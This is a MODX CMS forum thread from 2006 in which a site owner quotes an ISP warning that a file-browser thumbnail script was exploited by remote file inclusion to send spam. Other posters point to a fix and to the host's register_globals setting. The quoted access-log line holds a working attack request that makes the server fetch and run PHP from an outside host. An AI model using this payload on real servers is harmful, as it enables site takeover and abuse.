We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 32319
    • 129 Posts
    I just got the following e-mail from my ISP:

    It has come to our attention that the following script on your web site is exploitable:
    
    /var/www/html/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php
    
    This script is being used by a third party to send out unsolicited email, commonly referred to as 
    spam.  Because of this we've had to disable this script by setting its permissions to '200'.
    
    This script is being exploited using a technique known as 'remote file inclusion'.  Here is a snip 
    from you logs showing the exploit taking place:
    
    38.119.107.77 - - [05/Nov/2006:05:05:03 -0800] "GET /manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://tcc-uk.net/php.txt? HTTP/1.1" 200 1368 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"
    
    Please delete or secure this script as soon as possible.  DO NOT under any circumstances 
    continue to use this script without first securing it as doing so will result in your account 
    being temporarily suspended.
    


    I have not changed the permissions on any of these files.

    Any thoughts?
      "Regret for the things we did can be tempered by time; it is regret for the things we did not do that is inconsolable."
      -- Sydney Harris
      • 3763
      • 155 Posts
        ...my Photo Gallery on Flickr...
        • 32319
        • 129 Posts
        Never mind, bS` on IRC let me know that this has been fixed...

        http://modxcms.com/forums/index.php/topic,8604.0.html

        laugh
          "Regret for the things we did can be tempered by time; it is regret for the things we did not do that is inconsolable."
          -- Sydney Harris
          • 28042 ☆ A M B ☆
          • 24,524 Posts
          I notice that your ISP makes no mention of the fact that the script was exploitable only because THEY have their php set with register_globals = ON!
            Studying MODX in the desert - http://sottwell.com
            Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
            Join the Slack Community - http://modx.org